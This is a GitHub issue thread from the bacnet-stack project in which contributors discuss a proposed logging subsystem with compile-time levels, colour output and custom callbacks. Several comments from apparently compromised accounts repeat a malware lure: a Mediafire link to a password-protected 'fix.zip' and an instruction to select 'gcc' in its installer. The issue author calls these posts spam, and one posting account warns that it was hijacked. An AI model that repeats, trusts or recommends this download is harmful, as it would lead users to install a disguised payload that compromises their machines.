bacnet-stack/bacnet-stack #750: Improve logging mechanism

teksturi, 2024-08-26:
Currently I feel that logging is little mess. We print sometimes to stderr and sometimes to stdout. Also problem is that is hard to define custom mechanism without changing source. Also examples use various mechanisms to do logging.

I propose that we will have logging macros like example blog_error, blog_info, blog_debug. Then we will also implement way to set custom callback so anyone can easily change where and how to log things. I made demo about this thing to godbolt [1].

- Now changing log level affects so that we will compile time optimize away messages we do not want. This is nice when someone wants to build smaller program.
- Now logging support also coloring.
- Default print function will print fatal and err to stderr and everything else to stdout.
- Does use variadic macros. I plan to do it so cmake will check if compiler support those if not it will use DEBUG_LEVEL 0 and print warning that logging is disabled. Without variadic macros this kind of thing is really hard so I would vote that we do not even try.
- Logging level can be changed at runtime. Note that if level was compile time example WARN you cannot get TRACE message even if you set level to it as those are now compile time optimized away. At least we do not need this functionality but was wondering that some others might want it.
- I choose to make callback very minimal so we do not even format str before. User needs to format those themselves. 
- Note that godbolt prints stderr first and then stdout. It is just godbolt thing.

Has anyone against this idea? Details we can work later.

[1]: https://godbolt.org/#z:OYLghAFBqd5QCxAYwPYBMCmBRdBLAF1QCcAaPECAMzwBtMA7AQwFtMQByARg9KtQYEAysib0QXACx8BBAKoBnTAAUAHpwAMvAFYTStJg1DIApACYAQuYukl9ZATwDKjdAGFUtAK4sGIAMwapK4AMngMmAByPgBGmMQS0gAOqAqETgwe3r4BQSlpjgJhEdEscQlStpj2hQxCBEzEBFk%2BfoFVNRn1jQTFUbHxibYNTS057QojveH9ZYNSAJS2qF7EyOwc5v7hyN5YANQm/m6T%2BIIAdAhH2PsA9ABU%2B/zE%2B5OG6I3o%2B%2BEEmMDx%2BwIAE8kpgFPsvD8ABwAfQI%2B0wBGQ53291uJg0AEEtjs9phDsdTjFUJ5Ltc7o9noCEPi3gwPsQvsTPICQZgUWiMdizNsGLsvAcjicCPhUGT/DcHvtuvTPvsAJK3ADyqPRWJxfLxBOF6FoeBi4sljxlDK%2BYRixEaQNVXI1/MFhJFjWAhttPNxAvxQsmxHCLquErdvPtXuODjZrvV7s1nu1CiBClujjYke5wa1QuT7ID2FtWMYPkOAHYrFj9uX9hZMW5ItgACowkJKgDijewADVsCEYZElbWCQARfZBLkVyvV2sNputkIdrswgBimLrmJCg/2XFIo4rVZr9cbLbbne72AASqf12Yt2WdxP99Oj/OAOqY0%2BRdf%2Ba%2BYse7ycHmdzt28qRAuKpHEO0jbuWv73oes7HjCA7YBYcjNuuACsX4/neU5wYBMJ1qe1Y3OB%2BwAGxfiYRYDkcpbYlity3PsygGNaADuhAINSYL4kk9BMEoQZYDQET7EhKGttgkSYhYs40VG/jCTMYnIahMJPvKdYABIwm4SpNqeQhCZgIn4uJakadpBHygAstgQgrjZyjGaZKkSY%2Ba5kXm9E%2BW8jjIPsABuqB4F8wlMF4tAEDCyAxDCVBeHytQQD8%2Bz0IF1SkPsaAMJM2UII0qLPCwTAEFl5wVQstHecCoLCUFIVfBA9wxLQqDADCbXAAuDALClghpZgGW0FlOV5cgBUvPcxWleVlXVVifl4AFqVdZ1Q3VOuMG4QBCGEcRC2%2BQ0/n7K17Wde1PXZXFa0JUlGTruFkXRbF8WJQ4GSHcFoWnWtSjRbd73JWdHVdVdd3IFV6ollB10XR1EO1OuEMEguTzvfsID7E9UUxXFiOff4dFUfJPkg/DV3k/80UEwIEDfegUPYjDN7lsQiKrAwcOA/dAiHST3lLStgj%2BGYcL7HWeBsDCSpUFQ/3rhoh21Zg9U%2Bl4Djjm4ETRQOpVeiz34VpCghcGR4tApgjS0RS%2ByYkOnKsxC0LiywsgBhYttcOBABShg2k7JsELC8IfECNtSlwFX%2BFwAdG%2BWQch/sbFhxHjze/4A42QIYcALRFuBQiJWHcck1rf4DsuuZE1yKtqwQxAa/Cu46wRUsG3RY6J%2BLCArMQh1dy78IsOEA/G0PryYKYNeBxPCDF%2Bz6AEAgCj89R5f7nWtnV8TWIM9j%2BtZjC/0wh8vwQLD22IVXqIxGfmBZUHZsW1bZDO4ISdu4ICCPxPYdM1RTuFY8BUH2BAO%2B%2BsFjFiAWOcsEDfi52uJbQqpFkH9xnvHWB8DMCIIlF/Ze658Ee1hmObBuDcBMGtKRVOGDYEVjIdcFOlDFZj3LALaGpN973yPifLMEAr5bzsrfLMWFx4fx7n3URCcJ4jwYF4X4Uj37B3FkoHK6AFCKO7vCee9JF7LwUAAw2Y4QFgJiFmKBgCSH0KzOQ3uqx1x2PQTArBNjriyMIeEeRmBWEuPbuQ1R65VE51XrQuhp1XESh0egPRK8HEL1Vvonx7Dmaky5MyWgB9fhHzaqIWgF8nZX0rnWG4LV76KIEdvYR7dFE/GfvCe48jkAwlQHLE%2BsivEaNhuk1E6jopMA%2BhlQxzjul%2BS8OCUiVAxCCVCeWdWmsCAsFRAQM6yAADW65IhyBCCEHxcz4RZkCmIQEgUfE/FFuLIg/MnYmOgIiLMLSw4XzMGRAggUsqbO2RYzOpENAWKMWEog65JbS1lvLREPixyvPOK84%2BU9DiWFIv1AgCxAVMS4BoDFEKKxQphWMuF1hEWAvMOhDcGLfmolJZimZsDlk5PWYivZgJFn3AWDksQfCIBjX2e3cWLLzAvMCtCwKsLIZJOorDG5tLUBrL%2Bc4scozxmZ0BI3bx1KxwPEeIyhZViKyPHLKlbFLARUViEFPYJhx0IWCCGRJW6EBznB1eWPV3wBqGphO48sNlPG/HGZaoI6EACcJg7UOqdrA51BrywLJhI48sWk%2B4WqtaQHkwb7WOopfq11UajUsBLmJZhLT9hEMTZuGOqbQ2YPDcArNTL3UCArNnb%2B%2BxC1oMTUELg3sQ3pojTW6Nrb9gAE1X7gjSHyfEXAA0YorWEp11b4RuqYdafN1pC1sUwJgelfrSBeTtWAousoqGZ1%2BdOmdPb53ZphECPNesV2gNbcGpN/gyLoXLd2udkKjV4AUL05depgAIHhEIJggU/TgioAYF03a1SVorNwnlJ9775Jg3Q7BWUIBP3NsiqVazyF9tfvCz2E6MWKJnehoeKKVmrNwzm%2Bt1gNxoa0RRul1H3X/yxeWOD0teHtyQzO0hIiwGMew1R640bHEMfI8JljsiSNhLI%2BIrDlGWOqIkwpvqOLhV4oCmislvyqpquAaAiAvSYT9McIM6B6aKxSjrDSIKYgvD4kLdGr9P6v0gCs7A3O%2Bx8jpAyt8UBN6/0AelMBv0Et27fHBOEBEcsp5lU82ObzGgAu/rwP%2BwDYWjARbYFF/YDBUDwhiyZKg8WsrvESxWbzERgClTwP5kxy98ThBmkjL9%2BXCv7GA0wOgTBWrsjjnxwzYCpOic/d%2BvK5JyWWLDUNnpkxTMDNDEOBujn2OwLLtUJQlnZtDfuCZsz9XltPCmaquVYTkkzsu2EqUBXfhYyzAALwEM18EWBdiNFVi67UWZDSvBFHqA0g2wk3Mac01piJ3XerBLKxLUonsvbywrQFTXsYgNK%2BzMdWUYtBPpJ03bfG4gEDXYwfYHgSBnH1l8OQDAjvEAUEc4F%2BIIByDrG4KBFWCczrZRkukppASRcdsh8NYOWlguiu0n164EeiSYja9b122HivVE7dmBBOb/dKmMteqTFrHWWg1H6OMXr4yBhkJFg1hqjQEONSaRUSAlTKvsCq5whlBhAfVcyklpKyWwKk90VBPeqVbJZHSekDJGSdkLbKNv4QTUaI8LllvqgxU8CQVelrU3rhm8L8wZg89ZTz8GtwqguAxAff4dCLAC/wvz%2BhEvZeK9cGr2YK8tfi%2Bl/L5a/w/gW9t6L/XzvFezB98L63jvjfu9kVH%2B3wfk%2BLABskH32GAsMFbFcCA2G0ek/x%2BIIn2PyfaDHwbqBh9WfSI56u%2BP1vY%2BzBLhXDsm/tezyniVKeGvef9gvjfB/1vCoQJKi/5mBe5AH7RuC5jj5Oyr7EwB5B7uSh7WR2QOSYhOSXw4TXzFKZJnZoF7gNiCI3BZj8w8gb5UDeRjgLjyiziog%2BhWyLKkTpSbRCikRXwPjwTzgv6oz/ZYDEAvBYynArAEA%2BKHKdRfrwhMBJBXKYI3IMEZLkhrQyGw4E5q6cxiq65pge4mRuQWSaQ6T4HIGoFOycaYAXS5JPJkRlLwovLVL7AfIhDvJbIhD6bOJUBJC%2BiCBUAQA0GsCyZsLX7oQaBmDoAeZmD%2BGBHBGhHoAOohEaCKS15ZS/biaOq/YyYC4pgqapHZjxJLyxLpy/JEH%2BAkG2xe7qQ6GIH2SOTKClwKQaGBbB4lFWTh5v6R6YIuFuEEAeFeEsC37EqrwhEZ4N5d5WosBYw14yGp5tT04PoyGppZRjE%2Bin6WrTF2pOFBhbbeJOytE/AdENy0HdF9EjFP5zEn5GAZ4WBLEDgrEKSFFSjFEIGNGGRVGYLCFvBNAQDiFZStaXFPGbHuGeE7HeFPAO6zRdZJBfFjjCGuBvGgk%2BI/HtF/HswAkD7ax55fGwxyzeAKAIDwm0GolXG0DbY3F1FSQyRyTA7lj0yNSsobS0A%2BIUmhQLCtb5EkG2jK4%2BQ4i1HuRsFrjXCkTewMSPC2btaYkrC0BMhOYMC0DWh8T9L4hsQ0jsz2a%2BhMD4ABQlTIDECpB5Z4qREKh3oJpoAsBJB0DxCjiPDoCoBggdbwgKBeBJApBNDUipD4hWxpBgjwhsTMKArUxpT6iWjEDWiAoGlGn0B5aAr/SmlaG7RdiAioDDgoiCngi9xroZQvAcS0AZL4AM79ZdbpnYyYAxBeDABFpggM7/AKDTpC5bBKSiTkyTINB5Iu5QJUyQ60wMAQB9QsF4QIT36rhZQwgwjtiYgwivjNhCD9kALEH4nrFpjVn4i1mlRiAQCNlgIMwLBKxXH0ib7VEclqRckEjVxDj54KSzm/TnTxAanEBLmVSnkdTUxvS8xtkdnoGsH4Qv59kDlDkjljkwgTkFFTkuTKTkznkkBXmu4rmUnrlpjMnbmRkeT7mkT%2BAAU1lrQenEBtnLnNk0xm50xPm4H/geTqSviRDvmDnDmnijnjmrH/nHkmSAUoWNDoXXl0mMyQXr6bmkEwXFF7k8lKqSBIVzlrQtaoCgVNlrR3mtntn8LPldnzjASgQkWfnkXfm/lrH8U3kwhCUiXgX0msXEHsXu47lRncmBhKovo0WuTkxYAFnABaWYX3kfQ4VSV4UvkIRe4KVkUUU/lUWCTmV0XnRWWFlaXMVrmrH6WcV1HcUmVDheS%2BXIXnQNwym2ViUtnYWPlOV/guXzhgHYDuVfmUV4k%2BUzm0VxUdQJXrBBWrm6UFFhU%2BT7zkwnwyEW4KEsnOLSHnQyHagbw7QEW9i1iKHC7yHUlbTSVGU9h9g7wr7rxrGpYQCDXDT7ldX4VckERETgH9Xc7tVDXMEjUEXZWqEIhTk7YDWbXzX0HUmqEslqH7wsBAh4z3lNXUnW65Rx527TRAlO6NktWwzCF6h5TiGSHglMDH49BQkfHvVgkViuFbFPJmA2TWjIBjJEB0EhFBFxGH4Q3liBSwnbHmnyJg3ECO7lbQnUpQ2/FIkMAolCFA2QniG4ktHgZjJYn8HyKomslcipQlThAW7OjICjSvXOgnKZ7LFHWkK3QLl5J54CToBUC5zeyt4Y3qXAWXmS3foy1y1mAK3kyoVtkq3S2y2U3UrkyaW61q0G3DJrQBU2Um363y0%2BLkxlWYAw1S1q3wroToA17oR01jik1wl565z%2B3F4U223UrY1/HcFkB%2B0B315B0a0A30J/SQ6NWdmjVyVKia1i31lO2q25z57B3m1nk8EgXW252x2G30VoVZ160l3p3nTG2t7O051m1dIW35mBXF1N1Oz22WjlXF2u3u1P6e1x3lg%2B0eGR2ILR0d0tEj1h3nm37%2B3j3Il51kHx3nQNXnQSU3V3V3Q10Izi2V0y2IVL2d1rRK3725yH2l350dTa1n0X070aUMD8C32T2i3%2BWt1W313Z13121rQO23190e1e2Q1tGj2t7z2B2T3N2r2J3r2pUQC2H311mLnW18VH2YJAWF3K2f162oOX1QPX0MVn24P3111mAN3EM/1v3WVEMv0r2lXd2O0oMAMD1APlih2nCz3k0QNoPJIcBLC0CcDoS8B%2BDcC8CoCcBuAEqWCvB9zrDwoxy8AECaB8NLCrIgCSBkTnAhHPpkSSCixFhQjoT%2BBQjSACMcCSDCPKOkDiMcC8AKAgBBBKMcBaBLBwCwBIBBnGlkAUCcqoCGleMgDABSBXg0BRTxD2PgJWMxDhBWicA8CkDRPMD%2BlKgxDaDxZxO8AGlsCCBKgSlAhWOW1uBiD4kZOkBYAlRGDiDOO8D4DsxLb2PVPBCqBTxeJWM/DVBWOA5%2BlAgeBYBWMn7DGiOkApnEhKADiYAVPAB6hGDKNLDgZMDAAKDth4CYBsRKiggiPxP8CCAiBiDsCVDbPyBKBqBWO6CbgGAzOmAIqWD6D6j2OQBLCoBJC1ANNiMpm%2BhYD3PtkdDxYZAuD0hjB%2BCbihAzClDlB6C%2Ba1CAsQupDpBFCgsDAVA/MOV1BTDQubh2C/MCDdBNB9BgvzDDA9DouEu4sItzAVBLAKCyP7P8OCOWONM2P7CqBQhkS5y6P7DADIABRSBaNgK4CEAkDyNcALCKOzOqMgDPLnAaMBpFhkRmABE94aCSCSDoSYRmMWOkAiNaDWOcB2MOOkBOMuOkBuOIAgACFJB40%2BOeP0DECRCsAbDMusvsucvcuSBaO8CqwCsfN6CHO7PiAHOyCKAqDqCNNnOkBsSWhJAZO0scBCOatWM2NKjyIWvwiFqOtsuSActcsbhutmBgIeD%2BM2tCsisGtiukBqNmBFhaNFhPo1u6NQgmNcBFj6CcAatatiO6u2D6uGsqMtscBmD0vas2OivVMLBLAplpDOCSBAA%3D

TerminatedGA, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

nxllxvxxd, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

teksturi, 2024-08-26:
There where two spam bots so I remove those.

luozhengdong, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

WaveListenToMe, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

skarg, 2024-08-26:
I like the idea of adding a 'logging' subsystem of some kind.

Some thoughts:

1. I worked with application logging in (Contiki-OS)[https://docs.contiki-ng.org/en/develop/doc/getting-started/The-Contiki-NG-logging-system.html] and with (Zephyr OS)[https://docs.zephyrproject.org/latest/services/logging/index.html], and we could adopt something similar to Contiki-OS. I already adopted mstimer.c from Contiki-OS for internal non-blocking timers.

2. The additional requirements for the command line applications are printing results to stdout and sending warnings and errors to stderr to give helpful clues to users of the command line applications or stderr can be piped to dev/null.  The stdout typcially follows a specified format, such as that from ASHRAE 135.1 EPICS TPI format, so a 'logger' would need to accomodate both, or be able to support multiple views. There have been (requests to use JSON format for the output from the command line applications)[https://github.com/bacnet-stack/bacnet-stack/issues/211].

3. Most (all?) of the basic service handlers that print are shared by deeply embedded code that is used in microcontrollers without any printing interface.

nxllxvxxd, 2024-08-26:
# **DO NOT DOWNLOAD ANYTHING I HAVE POSTED AS A COMMENT MY ACCOUNT WAS COMPROMISED AND BEING USED TO COMPROMISE OTHERS**

**I AM WORKING ON DELETING AND POSTING THIS ON ALL THREADS IN WHICH THEY USED MY ACCOUNT TO POST THIS**